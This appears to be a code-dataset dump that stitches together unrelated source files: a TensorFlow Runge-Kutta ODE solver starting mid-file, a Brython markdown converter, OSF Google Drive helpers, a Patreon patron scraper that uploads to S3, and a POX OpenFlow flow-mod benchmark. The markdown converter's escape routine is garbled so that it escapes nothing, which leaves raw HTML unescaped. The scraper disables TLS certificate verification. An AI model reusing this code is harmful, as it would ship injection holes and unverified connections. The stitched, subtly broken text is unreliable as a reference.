from tensorflow.python.ops import math_ops
from tensorflow.python.ops import tensor_array_ops
_ButcherTableau = collections.namedtuple(
'_ButcherTableau', 'alpha beta c_sol c_mid c_error')
# Parameters from Shampine (1986), section 4.
_DORMAND_PRINCE_TABLEAU = _ButcherTableau(
alpha=[1/5, 3/10, 4/5, 8/9, 1., 1.],
beta=[[1/5],
[3/40, 9/40],
[44/45, -56/15, 32/9],
[19372/6561, -25360/2187, 64448/6561, -212/729],
[9017/3168, -355/33, 46732/5247, 49/176, -5103/18656],
[35/384, 0, 500/1113, 125/192, -2187/6784, 11/84]],
c_sol=[35/384, 0, 500/1113, 125/192, -2187/6784, 11/84, 0],
c_mid=[6025192743/30085553152 / 2, 0, 51252292925/65400821598 / 2,
-2691868925/45128329728 / 2, 187940372067/1594534317056 / 2,
-1776094331/19743644256 / 2, 11237099/235043384 / 2],
c_error=[1951/21600 - 35/384,
0,
22642/50085 - 500/1113,
451/720 - 125/192,
-12231/42400 - -2187/6784,
649/6300 - 11/84,
1/60],
)
def _possibly_nonzero(x):
return isinstance(x, ops.Tensor) or x != 0
def _scaled_dot_product(scale, xs, ys, name=None):
"""Calculate a scaled, vector inner product between lists of Tensors."""
with ops.name_scope(name, 'scaled_dot_product', [scale, xs, ys]) as scope:
# Some of the parameters in our Butcher tableau include zeros. Using
# _possibly_nonzero lets us avoid wasted computation.
return math_ops.add_n([(scale * x) * y for x, y in zip(xs, ys)
if _possibly_nonzero(x) or _possibly_nonzero(y)],
name=scope)
def _dot_product(xs, ys, name=None):
"""Calculate the vector inner product between two lists of Tensors."""
with ops.name_scope(name, 'dot_product', [xs, ys]) as scope:
return math_ops.add_n([x * y for x, y in zip(xs, ys)], name=scope)
def _runge_kutta_step(func, y0, f0, t0, dt, tableau=_DORMAND_PRINCE_TABLEAU,
name=None):
"""Take an arbitrary Runge-Kutta step and estimate error.
Args:
func: Function to evaluate like `func(y, t)` to compute the time derivative
of `y`.
y0: Tensor initial value for the state.
f0: Tensor initial value for the derivative, computed from `func(y0, t0)`.
t0: float64 scalar Tensor giving the initial time.
dt: float64 scalar Tensor giving the size of the desired time step.
tableau: optional _ButcherTableau describing how to take the Runge-Kutta
step.
name: optional name for the operation.
Returns:
Tuple `(y1, f1, y1_error, k)` giving the estimated function value after
the Runge-Kutta step at `t1 = t0 + dt`, the derivative of the state at `t1`,
estimated error at `t1`, and a list of Runge-Kutta coefficients `k` used for
calculating these terms.
"""
with ops.name_scope(name, 'runge_kutta_step', [y0, f0, t0, dt]) as scope:
y0 = ops.convert_to_tensor(y0, name='y0')
f0 = ops.convert_to_tensor(f0, name='f0')
t0 = ops.convert_to_tensor(t0, name='t0')
dt = ops.convert_to_tensor(dt, name='dt')
dt_cast = math_ops.cast(dt, y0.dtype)
k = [f0]
for alpha_i, beta_i in zip(tableau.alpha, tableau.beta):
ti = t0 + alpha_i * dt
yi = y0 + _scaled_dot_product(dt_cast, beta_i, k)
k.append(func(yi, ti))
if not (tableau.c_sol[-1] == 0 and tableau.c_sol == tableau.beta[-1]):
# This property (true for Dormand-Prince) lets us save a few FLOPs.
yi = y0 + _scaled_dot_product(dt_cast, tableau.c_sol, k)
y1 = array_ops.identity(yi, name='%s/y1' % scope)
f1 = array_ops.identity(k[-1], name='%s/f1' % scope)
y1_error = _scaled_dot_product(dt_cast, tableau.c_error, k,
name='%s/y1_error' % scope)
return (y1, f1, y1_error, k)
def _interp_fit(y0, y1, y_mid, f0, f1, dt):
"""Fit coefficients for 4th order polynomial interpolation.
Args:
y0: function value at the start of the interval.
y1: function value at the end of the interval.
y_mid: function value at the mid-point of the interval.
f0: derivative value at the start of the interval.
f1: derivative value at the end of the interval.
dt: width of the interval.
Returns:
List of coefficients `[a, b, c, d, e]` for interpolating with the polynomial
`p = a * x ** 4 + b * x ** 3 + c * x ** 2 + d * x + e` for values of `x`
between 0 (start of interval) and 1 (end of interval).
"""
# a, b, c, d, e = sympy.symbols('a b c d e')
# x, dt, y0, y1, y_mid, f0, f1 = sympy.symbols('x dt y0 y1 y_mid f0 f1')
# p = a * x ** 4 + b * x ** 3 + c * x ** 2 + d * x + e
# sympy.solve([p.subs(x, 0) - y0,
# p.subs(x, 1 / 2) - y_mid,
# p.subs(x, 1) - y1,
# (p.diff(x) / dt).subs(x, 0) - f0,
# (p.diff(x) / dt).subs(x, 1) - f1],
# [a, b, c, d, e])
# {a: -2.0*dt*f0 + 2.0*dt*f1 - 8.0*y0 - 8.0*y1 + 16.0*y_mid,
# b: 5.0*dt*f0 - 3.0*dt*f1 + 18.0*y0 + 14.0*y1 - 32.0*y_mid,
# c: -4.0*dt*f0 + dt*f1 - 11.0*y0 - 5.0*y1 + 16.0*y_mid,
# d: dt*f0,
# e: y0}
a = _dot_product([-2 * dt, 2 * dt, -8, -8, 16], [f0, f1, y0, y1, y_mid])
b = _dot_product([5 * dt, -3 * dt, 18, 14, -32], [f0, f1, y0, y1, y_mid])
c = _dot_product([-4 * dt, dt, -11, -5, 16], [f0, f1, y0, y1, y_mid])
d = dt * f0
e = y0
return [a, b, c, d, e]
def _interp_fit_rk(y0, y1, k, dt, tableau=_DORMAND_PRINCE_TABLEAU):
"""Fit an interpolating polynomial to the results of a Runge-Kutta step."""
with ops.name_scope('interp_fit_rk'):
dt = math_ops.cast(dt, y0.dtype)
y_mid = y0 + _scaled_dot_product(dt, tableau.c_mid, k)
f0 = k[0]
f1 = k[-1]
return _interp_fit(y0, y1, y_mid, f0, f1, dt)
def _interp_evaluate(coefficients, t0, t1, t):
"""Evaluate polynomial interpolation at the given time point.
Args:
coefficients: list of Tensor coefficients as created by `interp_fit`.
t0: scalar float64 Tensor giving the start of the interval.
t1: scalar float64 Tensor giving the end of the interval.
t: scalar float64 Tensor giving the desired interpolation point.
Returns:
Polynomial interpolation of the coefficients at time `t`.
"""
with ops.name_scope('interp_evaluate'):
t0 = ops.convert_to_tensor(t0)
t1 = ops.convert_to_tensor(t1)
t = ops.convert_to_tensor(t)
dtype = coefficients[0].dtype
assert_op = control_flow_ops.Assert(
(t0 <= t) & (t <= t1),
['invalid interpolation, fails `t0 <= t <= t1`:', t0, t, t1])
with ops.control_dependencies([assert_op]):
x = math_ops.cast((t - t0) / (t1 - t0), dtype)
xs = [constant_op.constant(1, dtype), x]
for _ in range(2, len(coefficients)):
xs.append(xs[-1] * x)
return _dot_product(coefficients, reversed(xs))
def _optimal_step_size(last_step,
error_ratio,
safety=0.9,
ifactor=10.0,
dfactor=0.2,
order=5,
name=None):
"""Calculate the optimal size for the next Runge-Kutta step."""
with ops.name_scope(
name, 'optimal_step_size', [last_step, error_ratio]) as scope:
error_ratio = math_ops.cast(error_ratio, last_step.dtype)
exponent = math_ops.cast(1 / order, last_step.dtype)
# this looks more complex than necessary, but importantly it keeps
# error_ratio in the numerator so we can't divide by zero:
factor = math_ops.maximum(
1 / ifactor,
math_ops.minimum(error_ratio ** exponent / safety, 1 / dfactor))
return math_ops.div(last_step, factor, name=scope)
def _abs_square(x):
if x.dtype.is_complex:
return math_ops.square(math_ops.real(x)) + math_ops.square(math_ops.imag(x))
else:
return math_ops.square(x)
def _ta_append(tensor_array, value):
"""Append a value to the end of a tf.TensorArray."""
return tensor_array.write(tensor_array.size(), value)
class _RungeKuttaState(collections.namedtuple(
'_RungeKuttaState', 'y1, f1, t0, t1, dt, interp_coeff')):
"""Saved state of the Runge Kutta solver.
Attributes:
y1: Tensor giving the function value at the end of the last time step.
f1: Tensor giving derivative at the end of the last time step.
t0: scalar float64 Tensor giving start of the last time step.
t1: scalar float64 Tensor giving end of the last time step.
dt: scalar float64 Tensor giving the size for the next time step.
interp_coef: list of Tensors giving coefficients for polynomial
interpolation between `t0` and `t1`.
"""
class _History(collections.namedtuple(
'_History', 'integrate_points, error_ratio')):
"""Saved integration history for use in `info_dict`.
Attributes:
integrate_points: tf.TensorArray storing integrating time points.
error_ratio: tf.TensorArray storing computed error ratios at each
integration step.
"""
def _dopri5(func,
y0,
t,
rtol,
atol,
full_output=False,
first_step=None,
safety=0.9,
ifactor=10.0,
dfactor=0.2,
max_num_steps=1000,
name=None):
"""Solve an ODE for `odeint` using method='dopri5'."""
if first_step is None:
# at some point, we might want to switch to picking the step size
# automatically
first_step = 1.0
with ops.name_scope(
name, 'dopri5',
[y0, t, rtol, atol, safety, ifactor, dfactor, max_num_steps]) as scope:
first_step = ops.convert_to_tensor(first_step, dtype=t.dtype,
name='first_step')
safety = ops.convert_to_tensor(safety, dtype=t.dtype, name='safety')
ifactor = ops.convert_to_tensor(ifactor, dtype=t.dtype, name='ifactor')
dfactor = ops.convert_to_tensor(dfactor, dtype=t.dtype, name='dfactor')
max_num_steps = ops.convert_to_tensor(max_num_steps, dtype=dtypes.int32,
name='max_num_steps')
def adaptive_runge_kutta_step(rk_state, history, n_steps):
"""Take an adaptive Runge-Kutta step to integrate the ODE."""
y0, f0, _, t0, dt, interp_coeff = rk_state
with ops.name_scope('assertions'):
check_underflow = control_flow_ops.Assert(
t0 + dt > t0, ['underflow in dt', dt])
check_max_num_steps = control_flow_ops.Assert(
n_steps < max_num_steps, ['max_num_steps exceeded'])
check_numerics = control_flow_ops.Assert(
math_ops.reduce_all(math_ops.is_finite(abs(y0))),
['non-finite values in state `y`', y0])
with ops.control_dependencies(
[check_underflow, check_max_num_steps, check_numerics]):
y1, f1, y1_error, k = _runge_kutta_step(func, y0, f0, t0, dt)
with ops.name_scope('error_ratio'):
# We use the same approach as the dopri5 fortran code.
error_tol = atol + rtol * math_ops.maximum(abs(y0), abs(y1))
tensor_error_ratio = _abs_square(y1_error) / _abs_square(error_tol)
# Could also use reduce_maximum here.
error_ratio = math_ops.sqrt(math_ops.reduce_mean(tensor_error_ratio))
accept_step = error_ratio <= 1
with ops.name_scope('update/rk_state'):
# If we don't accept the step, the _RungeKuttaState will be useless
# (covering a time-interval of size 0), but that's OK, because in such
# cases we always immediately take another Runge-Kutta step.
y_next = control_flow_ops.cond(accept_step, lambda: y1, lambda: y0)
f_next = control_flow_ops.cond(accept_step, lambda: f1, lambda: f0)
t_next = control_flow_ops.cond(accept_step, lambda: t0 + dt, lambda: t0)
interp_coeff = control_flow_ops.cond(
accept_step,
lambda: _interp_fit_rk(y0, y1, k, dt),
lambda: interp_coeff)
dt_next = _optimal_step_size(dt, error_ratio, safety, ifactor, dfactor)
rk_state = _RungeKuttaState(
y_next, f_next, t0, t_next, dt_next, interp_coeff)
with ops.name_scope('update/history'):
history = _History(_ta_append(history.integrate_points, t0 + dt),
_ta_append(history.error_ratio, error_ratio))
return rk_state, history, n_steps + 1
def interpolate(solution, history, rk_state, i):
"""Interpolate through the next time point, integrating as necessary."""
with ops.name_scope('interpolate'):
rk_state, history, _ = control_flow_ops.while_loop(
lambda rk_state, *_: t[i] > rk_state.t1,
adaptive_runge_kutta_step,
(rk_state, history, 0),
name='integrate_loop')
y = _interp_evaluate(
rk_state.interp_coeff, rk_state.t0, rk_state.t1, t[i])
solution = solution.write(i, y)
return solution, history, rk_state, i + 1
assert_increasing = control_flow_ops.Assert(
math_ops.reduce_all(t[1:] > t[:-1]),
['`t` must be monotonic increasing'])
with ops.control_dependencies([assert_increasing]):
num_times = array_ops.size(t)
solution = tensor_array_ops.TensorArray(
y0.dtype, size=num_times).write(0, y0)
history = _History(
integrate_points=tensor_array_ops.TensorArray(
t.dtype, size=0, dynamic_size=True),
error_ratio=tensor_array_ops.TensorArray(
rtol.dtype, size=0, dynamic_size=True))
rk_state = _RungeKuttaState(
y0, func(y0, t[0]), t[0], t[0], first_step, interp_coeff=[y0] * 5)
solution, history, _, _ = control_flow_ops.while_loop(
lambda _, __, ___, i: i < num_times,
interpolate,
(solution, history, rk_state, 1),
name='interpolate_loop')
y = solution.stack(name=scope)
y.set_shape(t.get_shape().concatenate(y0.get_shape()))
if not full_output:
return y
else:
integrate_points = history.integrate_points.stack()
info_dict = {'num_func_evals': 6 * array_ops.size(integrate_points) + 1,
'integrate_points': integrate_points,
'error_ratio': history.error_ratio.stack()}
return (y, info_dict)
def odeint(func,
y0,
t,
rtol=1e-6,
atol=1e-12,
method=None,
options=None,
full_output=False,
name=None):
"""Integrate a system of ordinary differential equations.
Solves the initial value problem for a non-stiff system of first order ode-s:
```
dy/dt = func(y, t), y(t[0]) = y0
```
where y is a Tensor of any shape.
For example:
```
# solve `dy/dt = -y`, corresponding to exponential decay
tf.contrib.integrate.odeint(lambda y, _: -y, 1.0, [0, 1, 2])
=> [1, exp(-1), exp(-2)]
```
Output dtypes and numerical precision are based on the dtypes of the inputs
`y0` and `t`.
Currently, implements 5th order Runge-Kutta with adaptive step size control
and dense output, using the Dormand-Prince method. Similar to the 'dopri5'
method of `scipy.integrate.ode` and MATLAB's `ode45`.
Based on: Shampine, Lawrence F. (1986), "Some Practical Runge-Kutta Formulas",
Mathematics of Computation, American Mathematical Society, 46 (173): 135-150,
doi:10.2307/2008219
Args:
func: Function that maps a Tensor holding the state `y` and a scalar Tensor
`t` into a Tensor of state derivatives with respect to time.
y0: N-D Tensor giving starting value of `y` at time point `t[0]`. May
have any floating point or complex dtype.
t: 1-D Tensor holding a sequence of time points for which to solve for
`y`. The initial time point should be the first element of this sequence,
and each time must be larger than the previous time. May have any floating
point dtype. If not provided as a Tensor, converted to a Tensor with
float64 dtype.
rtol: optional float64 Tensor specifying an upper bound on relative error,
per element of `y`.
atol: optional float64 Tensor specifying an upper bound on absolute error,
per element of `y`.
method: optional string indicating the integration method to use. Currently,
the only valid option is `'dopri5'`.
options: optional dict of configuring options for the indicated integration
method. Can only be provided if a `method` is explicitly set. For
`'dopri5'`, valid options include:
* first_step: an initial guess for the size of the first integration
(current default: 1.0, but may later be changed to use heuristics based
on the gradient).
* safety: safety factor for adaptive step control, generally a constant
in the range 0.8-1 (default: 0.9).
* ifactor: maximum factor by which the adaptive step may be increased
(default: 10.0).
* dfactor: maximum factor by which the adpative step may be decreased
(default: 0.2).
* max_num_steps: integer maximum number of integrate steps between time
points in `t` (default: 1000).
full_output: optional boolean. If True, `odeint` returns a tuple
`(y, info_dict)` describing the integration process.
name: Optional name for this operation.
Returns:
y: (N+1)-D tensor, where the first dimension corresponds to different
time points. Contains the solved value of y for each desired time point in
`t`, with the initial value `y0` being the first element along the first
dimension.
info_dict: only if `full_output == True`. A dict with the following values:
* num_func_evals: integer Tensor counting the number of function
evaluations.
* integrate_points: 1D float64 Tensor with the upper bound of each
integration time step.
* error_ratio: 1D float Tensor with the estimated ratio of the integration
error to the error tolerance at each integration step. An ratio greater
than 1 corresponds to rejected steps.
Raises:
ValueError: if an invalid `method` is provided.
TypeError: if `options` is supplied without `method`, or if `t` or `y0` has
an invalid dtype.
"""
if method is not None and method != 'dopri5':
raise ValueError('invalid method: %r' % method)
if options is None:
options = {}
elif method is None:
raise ValueError('cannot supply `options` without specifying `method`')
with ops.name_scope(name, 'odeint', [y0, t, rtol, atol]) as scope:
# TODO(shoyer): use nest.flatten (like tf.while_loop) to allow `y0` to be an
# arbitrarily nested tuple. This will help performance and usability by
# avoiding the need to pack/unpack in user functions.
y0 = ops.convert_to_tensor(y0, name='y0')
if not (y0.dtype.is_floating or y0.dtype.is_complex):
raise TypeError('`y0` must have a floating point or complex floating '
'point dtype')
t = ops.convert_to_tensor(t, preferred_dtype=dtypes.float64, name='t')
if not t.dtype.is_floating:
raise TypeError('`t` must have a floating point dtype')
error_dtype = abs(y0).dtype
rtol = ops.convert_to_tensor(rtol, dtype=error_dtype, name='rtol')
atol = ops.convert_to_tensor(atol, dtype=error_dtype, name='atol')
return _dopri5(func, y0, t,
rtol=rtol,
atol=atol,
full_output=full_output,
name=scope,
**options)
| mit |
2014c2g4/2015cda0623 | static/Brython3.1.1-20150328-091302/Lib/markdown2.py | 669 | 8143 | import browser.html
import re
class URL:
def __init__(self,src):
elts = src.split(maxsplit=1)
self.href = elts[0]
self.alt = ''
if len(elts)==2:
alt = elts[1]
if alt[0]=='"' and alt[-1]=='"':self.alt=alt[1:-1]
elif alt[0]=="'" and alt[-1]=="'":self.alt=alt[1:-1]
elif alt[0]=="(" and alt[-1]==")":self.alt=alt[1:-1]
class CodeBlock:
def __init__(self,line):
self.lines = [line]
def to_html(self):
if self.lines[0].startswith("`"):
self.lines.pop(0)
res = escape('\n'.join(self.lines))
res = unmark(res)
res = '<pre class="marked">%s</pre>\n' %res
return res,[]
class Marked:
def __init__(self, line=''):
self.line = line
self.children = []
def to_html(self):
return apply_markdown(self.line)
# get references
refs = {}
ref_pattern = r"^\[(.*)\]:\s+(.*)"
def mark(src):
global refs
refs = {}
# split source in sections
# sections can be :
# - a block-level HTML element (markdown syntax will not be processed)
# - a script
# - a span-level HTML tag (markdown syntax will be processed)
# - a code block
# normalise line feeds
src = src.replace('\r\n','\n')
# lines followed by dashes
src = re.sub(r'(.*?)\n=+\n', '\n# \\1\n', src)
src = re.sub(r'(.*?)\n-+\n', '\n## \\1\n', src)
lines = src.split('\n')
i = bq = 0
ul = ol = 0
while i<len(lines):
# enclose lines starting by > in a blockquote
if lines[i].startswith('>'):
nb = 1
while nb<len(lines[i]) and lines[i][nb]=='>':
nb += 1
lines[i] = lines[i][nb:]
if nb>bq:
lines.insert(i,'<blockquote>'*(nb-bq))
i += 1
bq = nb
elif nb<bq:
lines.insert(i,'</blockquote>'*(bq-nb))
i += 1
bq = nb
elif bq>0:
lines.insert(i,'</blockquote>'*bq)
i += 1
bq = 0
# unordered lists
if lines[i].strip() and lines[i].lstrip()[0] in '-+*' \
and (i==0 or ul or not lines[i-1].strip()):
print('is ul',lines[i])
# line indentation indicates nesting level
nb = 1+len(lines[i])-len(lines[i].lstrip())
lines[i] = '<li>'+lines[i][1+nb:]
if nb>ul:
lines.insert(i,'<ul>'*(nb-ul))
i += 1
elif nb<ul:
lines.insert(i,'</ul>'*(ul-nb))
i += 1
ul = nb
elif ul:
lines.insert(i,'</ul>'*ul)
i += 1
ul = 0
# ordered lists
mo = re.search(r'^(\d+\.)',lines[i])
if mo:
if not ol:
lines.insert(i,'<ol>')
i += 1
lines[i] = '<li>'+lines[i][len(mo.groups()[0]):]
ol = 1
elif ol:
lines.insert(i,'</ol>')
i += 1
ol = 0
i += 1
sections = []
scripts = []
section = Marked()
i = 0
while i<len(lines):
line = lines[i]
if line.strip() and line.startswith(' '):
if isinstance(section,Marked) and section.line:
sections.append(section)
section = CodeBlock(line[4:])
j = i+1
while j<len(lines) and lines[j].strip() \
and lines[j].startswith(' '):
section.lines.append(lines[j][4:])
j += 1
sections.append(section)
section = Marked()
i = j
continue
elif line.lower().startswith('<script'):
if isinstance(section,Marked) and section.line:
sections.append(section)
section = Marked()
j = i+1
while j<len(lines):
if lines[j].lower().startswith('</script>'):
scripts.append('\n'.join(lines[i+1:j]))
for k in range(i,j+1):
lines[k] = ''
break
j += 1
i = j
continue
else:
mo = re.search(ref_pattern,line)
if mo is not None:
if isinstance(section,Marked) and section.line:
sections.append(section)
section = Marked()
key = mo.groups()[0]
value = URL(mo.groups()[1])
refs[key.lower()] = value
else:
if line.strip():
if section.line:
section.line += ' '
section.line += line
else:
sections.append(section)
section = Marked()
i += 1
res = ''
for section in sections:
mk,_scripts = section.to_html()
res += '<p>'+mk+'\n'
scripts += _scripts
return res,scripts
def escape(czone):
czone = czone.replace('&','&')
czone = czone.replace('<','<')
czone = czone.replace('>','>')
return czone
def s_escape(mo):
# used in re.sub
czone = mo.string[mo.start():mo.end()]
return escape(czone)
def unmark(code_zone):
# convert _ to _ inside inline code
code_zone = code_zone.replace('_','_')
return code_zone
def s_unmark(mo):
# convert _ to _ inside inline code
code_zone = mo.string[mo.start():mo.end()]
code_zone = code_zone.replace('_','_')
return code_zone
def apply_markdown(src):
scripts = []
# replace \` by `
src = re.sub(r'\\\`','`',src)
# escape < > & in inline code
code_pattern = r'\`(\S.*?\S)\`'
src = re.sub(code_pattern,s_escape,src)
# also convert _
src = re.sub(code_pattern,s_unmark,src)
# inline links
link_pattern1 = r'\[(.+?)\]\s?\((.+?)\)'
def repl(mo):
g1,g2 = mo.groups()
g2 = re.sub('_','_',g2)
return '<a href="%s">%s</a>' %(g2,g1)
src = re.sub(link_pattern1,repl,src)
# reference links
link_pattern2 = r'\[(.+?)\]\s?\[(.*?)\]'
while True:
mo = re.search(link_pattern2,src)
if mo is None:break
text,key = mo.groups()
print(text,key)
if not key:key=text # implicit link name
if key.lower() not in refs:
raise KeyError('unknow reference %s' %key)
url = refs[key.lower()]
repl = '<a href="'+url.href+'"'
if url.alt:
repl += ' title="'+url.alt+'"'
repl += '>%s</a>' %text
src = re.sub(link_pattern2,repl,src,count=1)
# emphasis
# replace \* by *
src = re.sub(r'\\\*','*',src)
# replace \_ by _
src = re.sub(r'\\\_','_',src)
# _ and * surrounded by spaces are not markup
src = re.sub(r' _ ',' _ ',src)
src = re.sub(r' \* ',' * ',src)
strong_patterns = [('STRONG',r'\*\*(.*?)\*\*'),('B',r'__(.*?)__')]
for tag,strong_pattern in strong_patterns:
src = re.sub(strong_pattern,r'<%s>\1</%s>' %(tag,tag),src)
em_patterns = [('EM',r'\*(.*?)\*'),('I',r'\_(.*?)\_')]
for tag,em_pattern in em_patterns:
src = re.sub(em_pattern,r'<%s>\1</%s>' %(tag,tag),src)
# inline code
# replace \` by `
src = re.sub(r'\\\`','`',src)
code_pattern = r'\`(.*?)\`'
src = re.sub(code_pattern,r'<code>\1</code>',src)
# ordered lists
lines = src.split('\n')
atx_header_pattern = '^(#+)(.*)(#*)'
for i,line in enumerate(lines):
print('line [%s]' %line, line.startswith('#'))
mo = re.search(atx_header_pattern,line)
if not mo:continue
print('pattern matches')
level = len(mo.groups()[0])
lines[i] = re.sub(atx_header_pattern,
'<H%s>%s</H%s>\n' %(level,mo.groups()[1],level),
line,count=1)
src = '\n'.join(lines)
src = re.sub('\n\n+','\n<p>',src)+'\n'
return src,scripts
| gpl-3.0 |
ticklemepierce/osf.io | website/addons/googledrive/utils.py | 8 | 2493 | # -*- coding: utf-8 -*-
"""Utility functions for the Google Drive add-on.
"""
import os
import logging
from urllib import quote
logger = logging.getLogger(__name__)
class GoogleDriveNodeLogger(object):
"""Helper class for adding correctly-formatted Google Drive logs to nodes.
Usage: ::
from website.project.model import NodeLog
node = ...
auth = ...
nodelogger = GoogleDriveNodeLogger(node, auth)
nodelogger.log(NodeLog.FILE_REMOVED, save=True)
:param Node node: The node to add logs to
:param Auth auth: Authorization of the person who did the action.
"""
def __init__(self, node, auth, path=None):
self.node = node
self.auth = auth
self.path = path
def log(self, action, extra=None, save=False):
"""Log an event. Wraps the Node#add_log method, automatically adding
relevant parameters and prefixing log events with `"googledrive_"`.
:param str action: Log action. Should be a class constant from NodeLog.
:param dict extra: Extra parameters to add to the ``params`` dict of the
new NodeLog.
"""
params = {
'project': self.node.parent_id,
'node': self.node._primary_key,
'folder': self.node.get_addon('googledrive', deleted=True).folder_path
}
if extra:
params.update(extra)
# Prefix the action with googledrive
self.node.add_log(
action="googledrive_{0}".format(action),
params=params,
auth=self.auth
)
if save:
self.node.save()
def build_googledrive_urls(item, node, path):
return {
'fetch': node.api_url_for('googledrive_folders', folderId=item['id']),
'folders': node.api_url_for('googledrive_folders', folderId=item['id'], path=path),
}
def to_hgrid(item, node, path):
"""
:param item: contents returned from Google Drive API
:return: results formatted as required for Hgrid display
"""
# quote fails on unicode objects with unicode characters
# covert to str with .encode('utf-8')
safe_name = quote(item['title'].encode('utf-8'), safe='')
path = os.path.join(path, safe_name)
serialized = {
'path': path,
'id': item['id'],
'kind': 'folder',
'name': safe_name,
'addon': 'googledrive',
'urls': build_googledrive_urls(item, node, path=path)
}
return serialized
| apache-2.0 |
MultiMC/PatronScraper2 | patronscraper.py | 1 | 1625 | #!/usr/bin/env python2
from lxml import html
import requests
from operator import methodcaller
import sys
import boto
from boto.s3.key import Key
import ssl
# See: https://github.com/boto/boto/issues/2836
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
page = requests.get('https://www.patreon.com/user?u=130816&ty=p')
if page.status_code == requests.codes.ok:
# determine new patrons
tree = html.fromstring(page.text)
patrons_extracted = tree.xpath("//a[contains(concat(' ', normalize-space(@class), ' '), ' favesHover ')]/@title")
new_patrons = filter(None, map(methodcaller("strip"), patrons_extracted))
try:
new_patrons.remove(u'');
except ValueError:
pass # do nothing!
# determine old patrons
conn = boto.connect_s3(validate_certs=False)
bucket = conn.get_bucket('files.multimc.org')
k = Key(bucket)
k.key = 'patrons.txt'
old_patrons = k.get_contents_as_string().decode('utf-8').split('\n')
old_patrons.sort(key=lambda y: y.lower())
try:
old_patrons.remove(u'');
except ValueError:
pass # do nothing!
# merge lists
patrons = new_patrons + list(set(old_patrons) - set(new_patrons))
patrons.sort(key=lambda y: y.lower())
# print
old_patron_text = "\n".join(old_patrons) + "\n"
patron_text = "\n".join(patrons) + "\n"
print old_patron_text
print "New:"
print patron_text
# upload to s3
k.set_metadata('Content-Type', 'application/json')
k.set_contents_from_string(patron_text)
sys.exit(0)
sys.exit(1)
| apache-2.0 |
PrincetonUniversity/AdvNet-OF_Scripts | evaluation/switch/flowmod_test/pox/pox/samples/l2_polling.py | 1 | 6809 | # Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
An L2 learning switch.
It is derived from one written live for an SDN crash course.
It is somwhat similar to NOX's pyswitch in that it installs
exact-match rules for each flow.
"""
from __future__ import division
from random import randrange
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str
from pox.lib.util import str_to_bool
import sys, os, commands, time
from pox.lib.util import dpidToStr
log = core.getLogger()
#-------------------------------define flow rate----------
flow_rate = 50
interval = 1/flow_rate
print 'current flow modification rate is:', flow_rate
global burst
burst = {}
# We don't want to flood immediately when a switch connects.
# Can be overriden on commandline.
_flood_delay = 0
class LearningSwitch (object):
"""
The learning switch "brain" associated with a single OpenFlow switch.
When we see a packet, we'd like to output it on a port which will
eventually lead to the destination. To accomplish this, we build a
table that maps addresses to ports.
We populate the table by observing traffic. When we see a packet
from some source coming from some port, we know that source is out
that port.
When we want to forward traffic, we look up the desintation in our
table. If we don't know the port, we simply send the message out
all ports except the one it came in on. (In the presence of loops,
this is bad!).
In short, our algorithm looks like this:
For each packet from the switch:
1) Use source address and switch port to update address/port table
2) Is transparent = False and either Ethertype is LLDP or the packet's
destination address is a Bridge Filtered address?
Yes:
2a) Drop packet -- don't forward link-local traffic (LLDP, 802.1x)
DONE
3) Is destination multicast?
Yes:
3a) Flood the packet
DONE
4) Port for destination address in our address/port table?
No:
4a) Flood the packet
DONE
5) Is output port the same as input port?
Yes:
5a) Drop packet and similar ones for a while
6) Install flow table entry in the switch so that this
flow goes out the appopriate port
6a) Send the packet out appropriate port
"""
def __init__ (self, connection, transparent):
# Switch we'll be adding L2 learning switch capabilities to
self.connection = connection
self.transparent = transparent
# Our table
self.macToPort = {}
# We want to hear PacketIn messages, so we listen
# to the connection
connection.addListeners(self)
# We just use this to know when to log a helpful message
self.hold_down_expired = _flood_delay == 0
#-----------------------
msg = of.ofp_flow_mod(command=of.OFPFC_DELETE)
# iterate over all connected switches and delete all their flows
connection.send(msg)
print "INFO: Clearing all flows..."
#for BCM switch only
msg = of.ofp_flow_mod()
msg.priority = 1000
msg.match.dl_type = 0x800
msg.match.in_port = 5
msg.match.nw_src = '10.0.0.1'
msg.idle_timeout = 3000
msg.hard_timeout = 3000
#msg.actions.append(of.ofp_action_output(port = 1))
self.connection.send(msg)
print 'INFO: add a default rule... (BCM only)'
#-------------------------
# (note that flow_mods match all flows by default)
os.system('./simplesniffer eth2&')
os.system('sudo bash ../pktgen/pktgen.conf.1-1-flow-dist.sh &')
time.sleep(5)
y = 0
print 'INFO: starting sending flow mod...'
for k in xrange(1,769):#the number of rules to install
#insert first
msg = of.ofp_flow_mod()
#msg.match = of.ofp_match.from_packet(packet, event.port)
#msg.priority = 20000 + randrange(1000)
msg.priority = 2000
msg.match.dl_type = 0x800
i = int(k / 256) + 56
j = k % 256
dst = '192.168.' + str(i) + '.' + str(j)
#msg.match.in_port = 1
#msg.match.nw_src = '10.0.0.1'
msg.match.nw_dst = dst
#print 'INFO',dst, time.time()
msg.idle_timeout = 1600
msg.hard_timeout = 1600
msg.actions.append(of.ofp_action_output(port = 1))
#msg.data = event.ofp # 6a
self.connection.send(msg)
#print 'DATA: 10.0.0.1', dst, '%f' %time.time()
#print 'DATA: 10.0.0.1', dst, '%f' %time.time()
burst[dst] = time.time()
if k % 50 == 0:
self.connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
#if k == 40:
# self.connection.send(of.ofp_stats_request(body=of.ofp_port_stats_request()))
# if k == 80:
# self.connection.send(of.ofp_stats_request(body=of.ofp_queue_stats_request()))
time.sleep(interval)
print 'INFO: flow mod measure finished...'
#write file
w = open('poxout1','w')
for d in burst:
w.write('src: 10.0.0.1 dst: %s sec: %f usec: %f\n' %(d, int(burst[d]), (burst[d] - int(burst[d])) * 1000000 ))
w.close()
os.system('sudo bash cleanpox.sh') #self destrory
def _handle_PacketIn (self, event):
"""
Handle packet in messages from the switch to implement above algorithm.
"""
packet = event.parsed
#print 'PACKET_IN:', event.port, packet.next.dstip,'%f' % time.time()
def _handle_flowstats_received (event):
stats = flow_stats_to_list(event.stats)
